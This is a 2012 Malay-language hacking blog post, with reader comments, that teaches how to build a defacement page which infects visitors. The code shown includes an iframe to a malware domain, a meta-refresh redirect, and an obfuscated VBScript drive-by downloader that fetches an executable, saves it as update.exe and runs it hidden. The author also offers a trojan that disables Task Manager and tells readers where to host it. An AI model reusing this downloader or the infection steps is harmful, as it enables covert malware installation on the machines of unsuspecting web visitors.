Friday, April 27, 2012

Hacking : defacement dengan Trojan/malware dan Virus

Salam Sejahtera semua .http://upload.wikimedia.org/wikipedia/en/thumb/2/22/Distorted_waveforms_square_sine.svg/353px-Distorted_waveforms_square_sine.svg.png

Saya tidak bertanggung jawap atas apa apa kerosakan yang berlaku

agree ? Good

Free Download trojan aku bagi dengan korang ..

apa yang akan berlaku jika korang buka html ni :
1. anda akan ridirect ke malware website
2:anda akan download kenyalang.exe
3:anti virus akan block html ni


Apakah itu kenyalang.exe ?

Kenyalang .exe adalah File yang Saya buat ./ apa bila file tersebut dibuka ./ tast manager akan disable ./ dan faham faham lah korang .


         Hari Ni seth nak ajar korang cara membuat defacement yang akan detect Malware,virus dan Trojan

DI dalam defacement Korang.


Code di bawah korang masukan di dalam HTML korang . 


<iframe src="http://gumblar.cn/">

 Dan untuk kode dibawah korang letak di antara

<head> dan </head>

<meta HTTP-EQUIV="REFRESH" content="3; url=http://wikipaste.eu/">

Contoh Source code yang sudah selesai di gabungkan :

<HTML>
<iframe src="http://gumblar.cn/">
<BODY>
<script language="VBScript">
on error resume next
dl = "www.yoursite.com/trojan.exe"
Set df = document.createElement("object")
cls1="clsid:BD96"
cls2="C556-65A"
cls3="3-11D0-9"
cls4="83A-00C04FC29E36"
clsfull=cls1&cls2&cls3&cls4
df.setAttribute "classid",clsfull
strr1="Mic"
strr2="roso"
strr3="ft."
strr4="XML"
strr5="HTTP"
strr=strr1&strr2&strr3&strr4&strr5
Set x = df.CreateObject(strr,"")
ab1="A"
ab2="dod"
ab3="b.S"
ab4="t"
ab5="re"
ab6="am"
strb1=ab1&ab2&ab3&ab4&ab5&ab6
strb5=strb1
set YY = df.createobject(strb5,"")
YY.type = 1
str6="GET"
x.Open str6, dl, False
x.Send
fnamezz1="update.exe"
scripp1="Scrip"
scripp2="ting"
scripp3=".Fil"
scripp4="eSyste"
scripp5="mObject"
scripp=scripp1&scripp2&scripp3&scripp4&scripp5
set FF = df.createobject(scripp,"")
set tmp = F.GetSpecialFolder(2)
fnamezz1= FF.BuildPath(tmp,fnamezz1)
YY.open
YY.write x.responseBody
YY.savetofile fnamezz1,2
YY.close
set MM = df.createobject("Shell.Application","")
MM.ShellExecute fnamezz1,"","","open",0
<meta HTTP-EQUIV="REFRESH" content="3; url=http://wikipaste.eu/">
</script>
</BODY>
</HTML>

(save as .html)

Satu Peringatan ./ pada tulisan Hijau yang bertulis  www.yoursite.com/trojan.exe ./  k
Korangupload kenyalang.exe di mana mana filehosting dan masukan di www.yoursite.com/trojan.exe di dalam kode html itu tadi


Kenyalang.exe adalah trojan. korang dilarang untuk membukanya ./ kecuali korang tahu apa yang korang buat


4 34:

Herry Jack said...

seth nak tanya . yang kenyalang.exe tuh kena upload kat webhosting eh

Anonymous said...

yg kenyalangan.exe tuh nak upload kat webhosting ke seth.......

macammacam on April 28, 2012 at 5:23 AM said...

seth,cmne nk gune ni?kalu save kenyalang exe 2 dlm pendrive bole ke?

Seth ./ Erry on April 28, 2012 at 5:32 AM said...

Upload ke webhosting pun boleh . janji boleh support EXE.

macammacam

Boleh . janji jangan klik . :D

 

About

Site Info

Related Posts Plugin for WordPress, Blogger...

tutors Copyright © 2009 Community is Designed by Bie Converted To Community Galleria by Cool Tricks N Tips